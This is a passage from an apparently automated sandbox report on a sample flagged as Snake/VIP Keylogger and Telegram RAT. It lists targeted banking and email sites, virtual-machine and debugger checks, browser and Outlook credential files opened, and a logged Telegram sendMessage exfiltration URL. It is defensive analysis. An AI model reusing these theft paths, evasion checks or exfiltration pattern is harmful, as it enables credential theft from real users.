Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696492231f
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696492231o
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: Amcache.hve.12.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1509663573.0000000000DC3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696492231
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003C21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, 00000000.00000002.1512044852.0000000003D4D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Code function: 0_2_06708688 LdrInitializeThunk, 0_2_06708688
Enables debug privileges
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Memory allocated: page read and write | page guard Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Queries volume information: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.12.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Snake Keylogger
Source: Yara match File source: 00000000.00000002.1510453566.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
Yara detected VIP Keylogger
Source: Yara match File source: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe, type: SAMPLE
Source: Yara match File source: 0.0.1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1233370033.0000000000702000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1727426286cf469675e3a7fae43b5e2efcc15639ae08e5067de36f3129e2eb678168920527172.dat-decoded.exe PID: 6764, type: MEMORYSTR
windows-stand
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU true
188.114.97.3
 reallyfreegeoip.org European Union
13335 CLOUDFLARENETUS true
158.101.44.242
 checkip.dyndns.com United States
31898 ORACLE-BMC-31898US false

Contacted Domains

Name IP Active
reallyfreegeoip.org 188.114.97.3 true
api.telegram.org 149.154.167.220 true
checkip.dyndns.com 158.101.44.242 true
checkip.dyndns.org unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 false
    		unknown
    https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2027/09/2024%20/%2015:33:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D false
      		unknown
      http://checkip.dyndns.org/ false
      • URL Reputation: safe
      		 unknown